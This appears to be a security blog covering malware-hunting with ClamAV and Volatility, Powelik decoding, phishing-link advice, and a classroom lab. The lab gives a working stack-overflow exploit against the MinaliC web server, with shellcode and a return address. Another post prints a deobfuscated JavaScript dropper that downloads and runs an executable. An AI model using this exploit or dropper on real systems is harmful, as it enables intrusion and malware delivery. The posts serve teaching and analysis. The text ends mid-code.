Wednesday, February 25, 2015

What to do with MD5 checksums of files provided as an Indicator of Compromise?

As I have researched malware and its indicators of compromise, an MD5 checksum of the files is usually provided so that you can detect them in your environment.  I am not sure about your anti-virus, but I am not able to plug in an MD5 and have it search for that file across the enterprise as it does its scan.  Though the company I work with states that is a feature request they have.

Let's say I am researching the Dyre Banking Trojan and I pull up the SecureWorks report about it located at  As I scan through the report I come to the following section listing the MD5 checksums of the files I should look for on my enterprise network.

This is where ClamAV can assist.  You can create a custom database with these MD5 hashes.  The format of a custom MD5 database is hash:file size:malware name.  So I then create the file as follows:


However, I quickly notice that I do not have the file size.  I started to research to see if I could add a wildcard for the file size and came across this in the ClamAV documentation.

The above information allows a wildcard for the file size.  So I then create my custom database with the extension .hsb as follows.

Then, to use the database that I created, I run 'clamscan -i -r -d test.hsb'.  With -i it only shows infected files, -r is recursive, and -d is the directory or file where my databases exist.  If it finds a file that matches the custom database I came up with, the signature name will have .UNOFFICIAL appended, as shown below in the picture.

Being able to customize the database means that, on a Linux host where ClamAV is installed, you could mount a remote Windows share or administrative share and scan it for the hashes of interest.  Thus adding one more tool to your toolset...
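The custom-database workflow above, written out as a small Python program.  This is an added example of my own, not ClamAV code and not part of the original post: it builds the .hsb text from (hash, name) pairs, parses it back, and walks a directory hashing every file against it, which is what clamscan does for you with -r and -d.  The trailing :73 field is an assumption on my part about the minimum functionality level ClamAV wants when the size field is the * wildcard; check it against the signature documentation for your version.  The "indicator" is the MD5 of a constructed sample string, not a real hash from any report.

```python
import hashlib
import os
import tempfile

# ClamAV hash signature line, as on the page: hash:size:name. A "*" in the size
# field is the file-size wildcard; the trailing ":73" is, to my knowledge, the
# minimum functionality level ClamAV requires for wildcard sizes (assumption).
MIN_FLEVEL_FOR_WILDCARD = 73


def build_hsb(indicators):
    """Turn (md5_hex, malware_name) pairs into the text of a custom .hsb database."""
    lines = []
    for md5_hex, name in indicators:
        md5_hex = md5_hex.strip().lower()
        if len(md5_hex) != 32 or any(c not in "0123456789abcdef" for c in md5_hex):
            raise ValueError("not an MD5 hex digest: %r" % md5_hex)
        if not name or ":" in name:
            raise ValueError("malware name must be non-empty and contain no ':'")
        lines.append("%s:*:%s:%d" % (md5_hex, name, MIN_FLEVEL_FOR_WILDCARD))
    return "\n".join(lines) + "\n"


def parse_hsb(text):
    """Return {md5: name} from .hsb text, skipping blank lines and '#' comments."""
    db = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 3:
            raise ValueError("line %d: expected hash:size:name" % lineno)
        db[fields[0].lower()] = fields[2]
    return db


def md5_of_file(path, chunk_size=1 << 20):
    """Stream the file so large binaries do not have to fit in memory."""
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def scan_tree(root, db):
    """Recursively hash every file under root and report matches as
    (path, signature name + '.UNOFFICIAL'), mirroring clamscan -r -d custom.hsb."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for filename in files:
            path = os.path.join(dirpath, filename)
            name = db.get(md5_of_file(path))
            if name is not None:
                hits.append((path, name + ".UNOFFICIAL"))
    return sorted(hits)


def demo():
    """Constructed end-to-end run: the 'indicator' is the MD5 of a harmless
    sample string, not a real malware hash, so nothing here is a live IoC."""
    sample_bad = b"constructed sample standing in for a Dyre dropper"
    sample_good = b"constructed benign file content"
    indicators = [(hashlib.md5(sample_bad).hexdigest(), "Win.Trojan.Dyre-Sample")]
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "sub"))
        with open(os.path.join(root, "sub", "dropper.bin"), "wb") as fh:
            fh.write(sample_bad)
        with open(os.path.join(root, "readme.txt"), "wb") as fh:
            fh.write(sample_good)
        db = parse_hsb(build_hsb(indicators))
        hits = scan_tree(root, db)
    return [(os.path.relpath(p, root), n) for p, n in hits]


if __name__ == "__main__":
    for path, name in demo():
        print("%s: %s FOUND" % (path, name))
```

The scan reports the same name clamscan would print for a hit from an unofficial database.  Because the size field is a wildcard, only the digest is compared, so a report that gives hashes without sizes is enough to build the database.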

Friday, February 20, 2015

Volatility Script to Extract the Registry Keys where Powelik is Stored

Below is a bash script that analyzes the dllhost.exe process for the registry entries that could contain the Powelik trojan.  If it detects such an entry it attempts to dump the registry keys where the Powelik malware would be located.

#!/bin/bash
# Script to collect information by utilizing volatility
# Script is built to quickly identify the Powelik Trojan until the malware changes

####  Configurable Settings #############
# Placeholder values: adjust these to your environment
locVolPy="/path/to/volatility/"   # Volatility 2 entry point script
memImage="mem.dump"                     # memory image to analyze
outputDir="output"                      # plugin output is saved here
dumpDir="$outputDir/dump"
tempDir="$outputDir/temp"

if [ ! -d "$outputDir" ]; then
    mkdir -p "$outputDir"
    mkdir -p "$outputDir/vaddump"
    mkdir -p "$dumpDir"
    mkdir -p "$tempDir"
fi

# Find the profile for the image that is being analyzed and store it in volProfile
python "$locVolPy" -f "$memImage" imageinfo > "$outputDir/imageinfo"
grep "Suggested Profile(s)" "$outputDir/imageinfo" | awk '{print "Identified Profile: " $4}' | sed 's/,//'
volProfile=$(grep "Suggested Profile(s)" "$outputDir/imageinfo" | awk '{print $4}' | sed 's/,//')
if [ -z "$volProfile" ]; then
    echo "Could not determine a profile from imageinfo; check $outputDir/imageinfo"
    exit 1
fi

# Run the following volatility plugins to identify the dllhost.exe process ID and the hivelist
for pluginCommand in pslist hivelist; do
    echo "Running $pluginCommand and saving results to $outputDir/$pluginCommand"
    python "$locVolPy" -f "$memImage" --profile="$volProfile" "$pluginCommand" > "$outputDir/$pluginCommand"
done

# Identify the Process ID(s) of dllhost.exe (comma-separated, the form volatility's -p expects)
processID=$(grep -i "dllhost.exe" "$outputDir/pslist" | awk '{print $3}' | paste -sd, -)
if [ -n "$processID" ]; then
    echo "dllhost.exe was found at the following processID: $processID"
else
    echo "dllhost.exe Process ID was not found in the pslist..."
    exit 1
fi

# With the Process ID of dllhost lets do a vaddump of the process
python "$locVolPy" -f "$memImage" --profile="$volProfile" vaddump -p "$processID" -D "$outputDir/vaddump"

# Search the vaddump of the process for strings that match a clsid regular expression.
# ${regEntry:17} below drops the first 17 characters of the match (e.g. a "Software\Classes\"
# prefix) so the key path is relative to the root of the UsrClass.dat hive.
for regEntry in $(strings "$outputDir/vaddump"/* | egrep -i -e 'clsid\\\{[0-9A-Fa-f-]{36}\}\\localserver32'); do
    echo "Found the following clsid registry entry in the vaddump: $regEntry"
    # Find the virtual offset for the registry hives for the users on the computer
    for virtualOffset in $(grep -i "UsrClass.dat" "$outputDir/hivelist" | awk '{print $1}'); do
        echo "Found the virtual offset for the user at $virtualOffset"
        echo "Attempting to dump the registry value using volatility if it exists for the user..."
        python "$locVolPy" -f "$memImage" --profile="$volProfile" printkey -o "$virtualOffset" -K "${regEntry:17}"
    done
done

echo ""
echo "If the Powelik was identified you should see a bunch of randomness above..."
echo ""


Notes on Malware Analysis of the Trojan Powelik

Working with the Powelik Malware today, I thought I would record some of my notes so I could refer back to how I utilized volatility and other tools.

To find the malware it is embedded in the registry under a random key at the following location:


To confirm this, you can find various other analyses of Powelik online.  Another way to find the registry key is to run a vaddump on the dllhost.exe process that Powelik uses: -f mem.dump --profile=Win7SP0x86 vaddump -p <processid of dllhost.exe> -D <output>

Then search for signs of the CLSID\{<random>} registry key using the following command:

strings <output>* | grep -i -e "CLSID"

To extract the malware I used volatility to first identify where the registry hives are located: -f mem.dump --profile=Win7SP0x86 hivelist

This gives you the virtual offset of the UsrClass.dat hive for the user.  That offset can then be used to pull the registry key I am looking for: -f mem.dump --profile=Win7SP0x86 printkey -o 0xb5d54ae3 -K "CLSID\{<random>}\LocalServer32"

With the output of the (Default) value and the value named "a", I can see the malware embedded as the value of a.  The malware is encoded multiple times; to decode the first layer I used the "Microsoft Script Encoder", an interesting tool that developers can use with JavaScript and VBScript.

After that initial decode you see another section that needs to be base64 decoded, then another, and another.  After decoding it a few times the IP addresses and domains that the malware calls home to are displayed:,,,,,

Then, after decoding it a few more times, running foremost over the result carves out a DLL.  This DLL can then be uploaded to VirusTotal, which confirms that it is Powelik.
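The repeated base64 peeling described above, as an added helper of my own (not part of the original notes and not from any Powelik analysis).  It assumes the Script Encoder layer has already been removed; from there it keeps base64-decoding while the data is still clean base64, stops at the first layer that is not (the plaintext script, or a carved binary), and then pulls IPv4 addresses and domain-looking strings out of the result.  The nested sample is constructed inline from documentation-range addresses, not from the real malware.

```python
import base64
import binascii
import re

B64_RE = re.compile(rb"[A-Za-z0-9+/]+={0,2}")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+(?:com|net|org|info|biz|ru|su)\b", re.I)


def peel_base64(blob, max_layers=10):
    """Strip nested base64 layers. Decoding stops at the first layer that is not
    clean base64 (wrong length or bad alphabet), which is what you hit when the
    plaintext script or a carved binary appears. Returns (layers_removed, bytes)."""
    data = blob
    layers = 0
    while layers < max_layers:
        stripped = re.sub(rb"\s+", b"", data)
        if not stripped or len(stripped) % 4 or not B64_RE.fullmatch(stripped):
            break
        try:
            data = base64.b64decode(stripped, validate=True)
        except (binascii.Error, ValueError):
            break
        layers += 1
    return layers, data


def extract_indicators(data):
    """Pull IPv4 addresses and domain-looking strings out of decoded bytes."""
    text = data.decode("latin-1")
    ips = sorted(set(IPV4_RE.findall(text)))
    domains = sorted(set(d.lower() for d in DOMAIN_RE.findall(text)))
    return ips, domains


def analyze(blob):
    """Peel the layers and summarise what was found."""
    layers, plain = peel_base64(blob)
    ips, domains = extract_indicators(plain)
    return {"layers": layers, "plain": plain, "ips": ips, "domains": domains}


# Constructed sample: a stand-in for the decoded script fragment, using
# documentation-range addresses, wrapped in three base64 layers.
INNER_SCRIPT = b'var hosts = ["192.0.2.10", "198.51.100.7", "c2.example.net"]; // constructed'


def wrap_layers(data, layers):
    for _ in range(layers):
        data = base64.b64encode(data)
    return data


SAMPLE = wrap_layers(INNER_SCRIPT, 3)


if __name__ == "__main__":
    result = analyze(SAMPLE)
    print("layers removed:", result["layers"])
    print("callback IPs:", result["ips"])
    print("callback domains:", result["domains"])
```

When the innermost layer is the DLL rather than text, peel_base64 still stops cleanly because binary bytes fail the alphabet check; at that point the returned bytes are what you would hand to foremost or a PE parser.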

Deobfuscating Javascript

Today I came across some JavaScript madness inside a file that initially appears as a Word document attached to an email.  Below is a picture of some of the madness:

var a=''; var b=''; function lq() { b = 'eval'; a += 'ADODB'; tqk(); }; function j() { b = 'eval'; a += 's.Exp'; eky(); }; function ye() { b = 'eval'; a += 'ti'; xk(); }; function rbx() { b = 'eval'; a += '357'; dke(); }; function mx() { b = 'eval'; a += 'ment'; fr(); }; function jp() { b = 'eval'; a += '+St'; rxh(); }; function uuz() { b = 'eval'; a += ' ca'; d(); };

As you can tell, little pieces of the actual code are scattered everywhere.  To start deobfuscating the code I placed a line break before each function definition.

cat file.txt | sed 's/function/\nfunction/g'

The above command just does a string substitution, adding a new line before each function keyword.  Then I noticed the variable b = 'eval' never changes, so I removed it from the functions using sed once again:

cat newfile.txt | sed "s/b = 'eval';//"

Then, since the assembled code has to execute somehow, I looked through it and found the line this[b](a);.  With b always equal to 'eval', that line evaluates the assembled string.  I modified it to read document.write(a) and then ran the JavaScript in a sandbox.

The output of the deobfuscated code came out to be the code below:

function dl(fr,fn,rn) {
    var ws = new ActiveXObject("WScript.Shell");
    var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+fn;
    var xo = new ActiveXObject("MSXML2.XMLHTTP");
    xo.onreadystatechange = function() {
        if (xo.readyState === 4) {
            var xa = new ActiveXObject("ADODB.Stream");
            // a statement was lost here in the page's extraction (it survives only as ";")
            xa.type = 1;
            xa.write(xo.ResponseBody);
            xa.position = 0;
            xa.saveToFile(fn,2);
            xa.close();
        };
    };
    try {
        // a statement was lost here in the page's extraction (it survives only as: "GET",fr,false);)
        xo.send();
        if (rn > 0) { ws.Run(fn,0,0); };
    } catch (er) { };
};
dl("hyyp://<random number>&rnd=<random number>","69923439.exe",1)

The above JavaScript will create a file called 69923439.exe in the temp directory, using WScript, if it can download the file at the URL listed.

The goal of this post was to display the deobfuscation of the badness.

Monday, February 16, 2015

Links inside of Emails - The good, the bad and the ugly...

So I was listening to the following podcast and it began discussing a question about links inside of emails.  I have pasted the discussion below from the transcribed notes.  Thanks Steve and Leo for the great podcast.


SERIES:  Security Now!
DATE:  February 10, 2015
TITLE:  Listener Feedback #206
SPEAKERS: Steve Gibson & Leo Laporte

"...LEO: Justin Aborn in Boston. He wants to know how to be sure about emailed links. He wants to know how whether to click on them: My bank just emailed me a clickable link. I'm 99.9% sure it's truly them, but I navigate to their site by hand, rather than click on the emailed link. To check the fit of my tinfoil hat, what do you recommend as the minimum procedure to confidently click an emailed URL? It would be a lot more convenient if we could just click on them.

STEVE:  Yeah.  And I liked this also because in the context of Anthem, as you said, Leo, we're seeing now a big phishing wave of fake email coming out.  The only way, I mean, the old-school way is to look at the email headers, which are generally available.  But, boy, that's confusing.  And headers are highly prone to being spoofed.  I think the only thing I could suggest, first of all, is don't.  They're just, you know, it's really not worth it.  But if you have to, what you need to do is look at the source.  That is, you need to be able to examine the source of the email.

The problem is that email today is HTML.  And there's what you see is the result of the HTML markup which has created a presentation.  And so you can see text that is underlined that says "Click here to email Anthem."  Or I don't think he gave an example.  Or his bank.  And in fact it can even show you, like with no typos, exactly that URL, except that that's the presentation of the HTML.  The markup is in brackets on either side of that, and it's hidden from you, by design, by the browser.  By the browser or now, you know, email has become HTML, so your email client is hiding that on purpose to give you a nice, visible, simplified link to click on.

So it's only by looking at the source that you can verify the actual URL that you're going to click on, if you did.  And you might very well see that inside of brackets where on the left-hand side there is, which is the actual URL that you will visit if you click that link.  It's only by looking at the source that you can know.  And the other problem is scripting gets involved, too, because there could be an on-click phrase, even if the href, as it's called, is correct.  If there was an on-click, it turns out the JavaScript gets invoked before the href in the link is visited.

I just was dealing with all of this, as it happens, because I've added automation to the SQRL demo so that when you authenticate with a client the web page, the SQRL demo web page immediately, instantly updates itself to show you that you're now logged in.  So I was visiting all this.  And the JavaScript is invoked first.  And that could be in an included library that you don't even see.  So, boy.  Unfortunately, the bad guys have a real advantage here.  And I hope maybe I've made the case for my first recommendation, which is don't, because...

LEO:  So a number of people in the chatroom are saying in some email clients, if, for instance, you hover your mouse over the - the real problem is that the presentation layer is HTML.  That hides what the actual link is, even if it looks like it's a link, as you said.  But if you hover your mouse over that, can you capture on hover in JavaScript and prevent the status line from showing the actual URL?  Or am I going to see the actual URL in the status line at that point?

STEVE:  Whether it was in the status line, or sometimes it comes up as a little toolkit right there.

LEO:  As a toolkit, right.

STEVE:  Right.  Unfortunately, that will show you the static href, not the on-click call.

LEO:  On-click.

STEVE:  Yes.

LEO:  And that's what you're going to go to is what happens when you click.

STEVE:  Yes.

LEO:  So it can actually be so obfuscated that it's in JavaScript.

STEVE:  Even that, right.

LEO:  And you can, you know, you say, well, view source.  But even then the JavaScript could be further obfuscated.

STEVE:  Oh, yeah.

LEO:  You wouldn't see anything that says HTTP.  You might see just nonsense.

STEVE:  Yeah.

LEO:  Wow.  So hovering is not going to do it.

STEVE:  Not even that.

LEO:  You really just shouldn't.  You should, I guess, what you should do is manually go to the website, by hand enter the URL.

STEVE:  I really think, yes, in fact, I think that that's...

LEO:  So right-click, copy, and paste isn't going to do it, either.

STEVE:  Nope.  It won't because you're actually, you're going to execute code as a result of clicking on that.

LEO:  Wow.

STEVE:  Yeah.

LEO:  Isn't that amazing.  That's great.  That's - I think, frankly, turn off HTML email, period.  It shouldn't be allowed.  It's a bad idea.

STEVE:  And scripting in email.  I mean, how much malware has crawled into people's machines from email scripting?

LEO:  Yeah, yeah, yeah.  A good email client will not do HTML.  Unfortunately, most of us now use web browsers to do email.

STEVE:  Right.

LEO:  Which means you're screwed.

STEVE:  Right.  Basically you are...

LEO:  Don't click that link.

STEVE:  You're receiving a web page from someone you have no control over, you don't know who they are, they're claiming to be somebody who is working in your benefit.  The best advice, and I don't remember where it originated, if it was from Brian Krebs or someone else, but I loved it, and we've discussed it here through the years, and that is never do something that you didn't go in search of.  If a popup says, oh, you need to update your Flash Player, no.  If you weren't going, if you didn't have some reason to go looking to update your Flash Player, don't accept an offer to do so.  You just can't do that safely..."

I completely understand the impact that JavaScript can have on a web page and how it can manipulate HTML elements.  I find that Outlook, Outlook Web Access and many other clients block scripting in the email client.

Below is a quick proof-of-concept showing an HTML page with a link that has an onclick event which manipulates the link as it is clicked.  In an HTML page by itself the link would be manipulated and take you to the onclick target rather than the displayed href.  So for this example I emailed the page to myself.

I used PHP and an email relay to send the message with the link to my Outlook client.  The email showed up and I was able to click the link; however, due to the way Outlook renders HTML email, the script tag and the onclick attribute are not recognized.

More research could be done here, but certain HTML is blocked because of the way mail clients render it.

Another issue with webmail clients is the way they redirect links.  This makes it more difficult to see where you are actually going.  For example, here is a screenshot of the above email opened in Outlook Web Access.  As you hover over the link, its destination is somewhat masked by the mail client itself.
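Steve's advice in the transcript is to look at the source rather than the rendered link.  The following is an added example of my own (not part of the original post or the podcast) that does exactly that over an email body: it lists every anchor with its href, any on* handler attributes, and the visible text, and flags a link when a script handler is attached, when the visible text is itself a URL whose host differs from the href host, or when the href is not a plain http(s) URL.  The message body is constructed inline using reserved example.* hostnames.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


def host_of(text):
    """Hostname if the text is an http(s) URL, else None."""
    parsed = urlparse(text.strip())
    if parsed.scheme in ("http", "https") and parsed.hostname:
        return parsed.hostname.lower()
    return None


class LinkAuditor(HTMLParser):
    """Collects every <a> with its href, any on* handler attributes and visible text."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            a = {k.lower(): (v or "") for k, v in attrs}
            self._open = {"href": a.get("href", ""),
                          "handlers": sorted(k for k in a if k.startswith("on")),
                          "text": ""}

    def handle_data(self, data):
        if self._open is not None:
            self._open["text"] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._open is not None:
            self.links.append(self._finish(self._open))
            self._open = None

    @staticmethod
    def _finish(link):
        link["text"] = " ".join(link["text"].split())
        shown, target = host_of(link["text"]), host_of(link["href"])
        reasons = []
        if link["handlers"]:
            reasons.append("script handler: " + ", ".join(link["handlers"]))
        if shown is not None and shown != target:
            reasons.append("visible URL host %s != href host %s" % (shown, target))
        if target is None and link["href"]:
            reasons.append("href is not a plain http(s) URL")
        link["reasons"] = reasons
        link["suspicious"] = bool(reasons)
        return link


def audit_links(html):
    """Return one dict per <a> in document order."""
    parser = LinkAuditor()
    parser.feed(html)
    parser.close()
    return parser.links


# Constructed sample message body; example.* hosts are reserved documentation names.
SAMPLE_EMAIL = """
<p>Dear customer, please confirm at
<a href="https://login.example.net/verify" onclick="redirect(this)">https://bank.example.com/login</a></p>
<p>Your statement: <a href="https://bank.example.com/statements">View statement</a></p>
<p>Help: <a href="javascript:void(0)">Contact us</a></p>
"""


if __name__ == "__main__":
    for link in audit_links(SAMPLE_EMAIL):
        flag = "SUSPICIOUS" if link["suspicious"] else "ok"
        print("%-10s %-40s %s" % (flag, link["href"], "; ".join(link["reasons"])))
```

The check only catches what is visible in the source.  A link whose text is "View statement" pointing at an unrelated host is not flagged, and a handler defined in an included script rather than an on* attribute is invisible to it, which is the point Steve makes about scripting: hovering shows the static href, not what runs on click.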

While we are discussing issues: on mobile devices, hovering over a link gives no indication of where it goes before you click it.  Again, this emphasizes the point of not clicking on links in emails.

When I have told people not to click on links in emails, the user then returns to his computer, looks at his emails and notices that 80% or more have links inside them, most of which they need to conduct business.

What is the best strategy to educate people to not click on links? Is that even a strategy? 

I have found that educating people about phishing emails is a layered approach containing, but not limited to, the following steps:
1. Consider who the email is from: is it someone you know?
2. What is the content of the email?
3. Are you expecting the email?
4. Is the information in the email expected from the source you received it from?
5. If the information is important, can I call or text them as an out-of-band authentication of the email?
6. Is the grammar in the email what you would expect?
7. Show them phishing emails and what to look for.
8. Test, test, and retest phishing employees to verify they understand the concepts you are teaching and enforcing.

Those are a few thoughts I had on the podcast as I listened to the last question-and-answer session.

Fuzzing to Stack Based Overflow Exploit with MinaliC

For the computer science class that I am teaching I introduced stack-based overflows.  To demonstrate the concept I previously used vulnserver.exe and covered it in earlier blog posts.  This lab involves MinaliC.

You can refer to the following web site for the exploit:  We are going to step through it.  Also, the published exploit is for XP SP2 Pro; we will be using XP SP1.

1. We first run the MinaliC webserver on Windows XP SP1.  The vulnerable application can be downloaded from the link above.

2.  Then I am going to use Python to connect to the web server and pull down the above page; we will start there.


import socket

server = '' # Change to the IP Address of Windows XP SP1 VM
destPort = 8080

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, destPort))

pageRequest = 'index.htm'
hostInfo = ''   # value for the Host header, e.g. the same IP address

httpRequest =  'GET /' + pageRequest + ' HTTP/1.1\r\n'
httpRequest += 'Host: ' + hostInfo + '\r\n\r\n'
print httpRequest
s.send(httpRequest)    # the request must be sent before a response can be read
print s.recv(1024)
s.close()


3. Here is the output of the above Python script, showing an HTTP 200 for a successfully retrieved page:

GET /index.htm HTTP/1.1

HTTP/1.1 200 OK
Date: Thu, 12 Feb 2015 21:37:10 GMT
Content-Length: 349
Content-Type: text/html
Last-Modified: Thu, 12 Feb 2015 21:37:10 GMT
Server: MinaliC
Connection: Close
Set-Cookie: session_id=8GHvdwfQ1u0xGJbMdZi7CT62G5CbxK;

4.  Now I am going to change the Python code to begin fuzzing the web server.  I will fuzz the page portion of the request line: GET /<fuzz and see how long the buffer is> HTTP/1.1


import socket

server = '' # Change to the IP Address of Windows XP SP1 VM
destPort = 8080

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, destPort))

#pageRequest = 'index.htm'
pageRequest = "A"*150   # fuzz string in place of the page name
hostInfo = ''

httpRequest =  'GET /' + pageRequest + ' HTTP/1.1\r\n'
httpRequest += 'Host: ' + hostInfo + '\r\n\r\n'
print httpRequest
s.send(httpRequest)
print s.recv(1024)
s.close()




HTTP/1.1 404 Not Found
Date: Thu, 12 Feb 2015 21:41:17 GMT

5.  So the page came back with a 404 Not Found error.  Let's increase the number of A's sent until we see a crash occur.  When we increase the number of A's to 250 we notice that an HTTP 404 is no longer returned; instead the application appears to hang.

6.  From here we attach Immunity Debugger to MinaliC and observe whether EIP, the instruction pointer, is overwritten with A's.  Looking at the screenshot below we can see that it is.

7.  Now we need to control EIP, which means identifying how many bytes precede the four that land in EIP.  We will use /usr/share/metasploit-framework/tools/pattern_create.rb to generate a pattern 250 characters long and send it through Python.  Then we look at the registers and determine the offset with pattern_offset.rb, also in the tools directory.


import socket

server = '' # Change to the IP Address of Windows XP SP1 VM
destPort = 8080

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, destPort))

#pageRequest = 'index.htm'
#pageRequest = "A"*250
# /usr/share/metasploit-framework/tools/pattern_create.rb 250
pageRequest = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2A"
hostInfo = ''

httpRequest =  'GET /' + pageRequest + ' HTTP/1.1\r\n'
httpRequest += 'Host: ' + hostInfo + '\r\n\r\n'
print httpRequest
s.send(httpRequest)
print s.recv(1024)
s.close()


8. Observe that running the above Python script crashes the application and EIP is populated with part of the pattern.

9. Then use the Metasploit tool pattern_offset.rb on the value in EIP to determine the size of the buffer.

10. With the offset known we can now send 245 A's and 4 B's.  The B's should line up in the EIP register.  Then we can send 150 C's in the Host header.  In this example we are curious where the 150 C's will end up.  If we can place our shellcode in the C's and have EIP point to where they are located we can execute the shellcode.  Looking at where the EBX register points, execution there reads the 4 bytes at that address and then continues into the memory where the C's are located.

11. Here is the python code for the above proof-of-concept that was written:


import socket

# calc.exe shellcode; the remaining bytes are truncated on the original page
shellcode = (
"\x31\xd2\x52\x68\x63\x61\x6c\x63\x89\xe6\x52\x56\x64\x8b\x72" +
"\x30\x8b\x76\x0c\x8b\x76\x0c\xad\x8b\x30\x8b\x7e\x18\x8b\x5f" +
"\x3c\x8b\x5c\x1f\x78\x8b\x74\x1f\x20\x01\xfe\x8b\x4c\x1f\x24" +
"\x01\xf9\x0f\xb7\x2c\x51\x42\xad\x81\x3c\x07\x57\x69\x6e\x45"
)

junk = "\x42" * 245          # filler up to the 4 bytes that land in EIP
# 0x77c18cc8 jmp ebx
# 0x77c194a5 jmp ebx
returnAddr = "\xc8\x8c\xc1\x77"
host = "\x90"*30 + shellcode + "\x90"*31   # NOP sled around the shellcode in the Host header

httpRequest = "GET /" + junk + returnAddr + " HTTP/1.1\r\n"
httpRequest += "Host: " + host + "\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 8080))
s.send(httpRequest)
s.close()


12. A quick proof-of-concept to demonstrate stack based overflows.
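Steps 7 and 9 lean on pattern_create.rb and pattern_offset.rb.  Below is an added example of my own that reimplements what those two tools do (this is not Metasploit's code and not part of the original post): the pattern cycles upper-case, lower-case and digit so every 4-byte window is unique within the 20280-byte cycle, and the offset lookup accepts either the 4 ASCII bytes or the little-endian hex value a debugger shows for the register.  The test below checks that a 250-byte pattern reproduces the string used in step 7 and that the offset returned is the 245 used in step 10.

```python
import string


def pattern_create(length):
    """Generate the cyclic pattern pattern_create.rb produces: each 3-byte group
    is upper+lower+digit, so any 4-byte window is unique for the first 20280 bytes."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]   # length beyond one full cycle is not supported


def pattern_offset(value, length=20280):
    """Offset of a 4-byte register value in the pattern, or -1 if absent.
    Accepts the ASCII bytes ('1Ai2') or the little-endian hex a debugger shows
    for the register ('0x32694131')."""
    if value.lower().startswith("0x"):
        # the register shows the dword little-endian, so reverse the bytes back
        needle = bytes.fromhex(value[2:].zfill(8))[::-1].decode("ascii")
    else:
        needle = value
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_create(250))
    print("offset of 0x32694131:", pattern_offset("0x32694131"))
```

Because the lookup is a plain substring search, a -1 result means the register does not hold pattern bytes at all, which usually means the overwrite came from somewhere other than the buffer you fuzzed.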

Netflix Streaming Blocked by Sophos UTM

*** This solution no longer works with updates that Sophos has applied or changes that Netflix has made!

I was helping a friend with a Sophos UTM and found that Netflix would not stream on their mobile devices.  We went into the settings and, by studying the web log and how Netflix URLs are put together, created the following regex to add an exception so the AV would not scan the URL:


Below is a screenshot of the exception that was created:

Now, as long as the bot masters do not create a bot that uses that regex to exfil data, it will work great!!  Oh, by the way, the Sophos UTM is free for home use.  It is a nice Unified Threat Management (UTM) for home use and is a lot better than a router you can buy in a store.

Friday, February 6, 2015

Updated Powershell Script to Fix Unquoted Path Vulnerabilities

Here is an updated PowerShell script to fix unquoted path vulnerabilities:

# Find services whose executable path is unquoted and contains a space
$VulnServices = Get-WmiObject Win32_Service |
    Where-Object { $_ -and ($_.PathName -ne $null) -and ($_.PathName.Trim() -ne "") } |
    Where-Object { -not $_.PathName.StartsWith("`"") } |
    Where-Object { ($_.PathName.ToLower().IndexOf(".exe") -ge 0) -and
                   ($_.PathName.Substring(0, $_.PathName.ToLower().IndexOf(".exe") + 4) -match ".* .*") }

if ($VulnServices) {
    foreach ($service in $VulnServices) {
        $name = $service.Name
        $path = $service.PathName
        $key  = "hklm:\SYSTEM\CurrentControlSet\Services\" + $name

        if (Test-Path $key) {
            $info = (Get-ItemProperty $key -Name ImagePath -EA "SilentlyContinue").ImagePath

            #Check for quotes
            if ($info -eq "`"$path`"") {
                #FOR TESTING: Write-Host "Has quotes!" $name $info
            }
            #Check for no quotes: quote only the executable so any arguments after .exe keep working
            elseif ($info -eq $path) {
                #FOR TESTING: Write-Host "NO QUOTES!" $info
                $exeEnd = $path.ToLower().IndexOf(".exe") + 4
                $fixed  = "`"" + $path.Substring(0, $exeEnd) + "`"" + $path.Substring($exeEnd)
                Set-ItemProperty $key -Name ImagePath -Value $fixed
            }

            #FOR TESTING: $info = (Get-ItemProperty $key -Name ImagePath -EA "SilentlyContinue").ImagePath
            #FOR TESTING: $info
        }
    }
}
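The two decisions the script makes, "is this path vulnerable" and "what should the quoted value be", are easy to get subtly wrong: quoting the whole PathName also quotes any arguments after the .exe, and a directory name containing ".exe" can fool a naive search.  The following is an added example of my own, not part of the original post, that isolates those two decisions in Python so they can be tested against a constructed service table before anything touches the registry.  The service names and paths are made up.

```python
import re

# The executable ends at the first ".exe" followed by whitespace or end of string,
# so a directory such as C:\my tools.exe\ does not end the split early.
EXE_END_RE = re.compile(r"\.exe(?=\s|$)", re.IGNORECASE)


def split_image_path(pathname):
    """Split a raw ImagePath/PathName into (executable, arguments)."""
    p = pathname.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        if end == -1:
            raise ValueError("unterminated quote in %r" % pathname)
        return p[1:end], p[end + 1:].strip()
    m = EXE_END_RE.search(p)
    if m is None:
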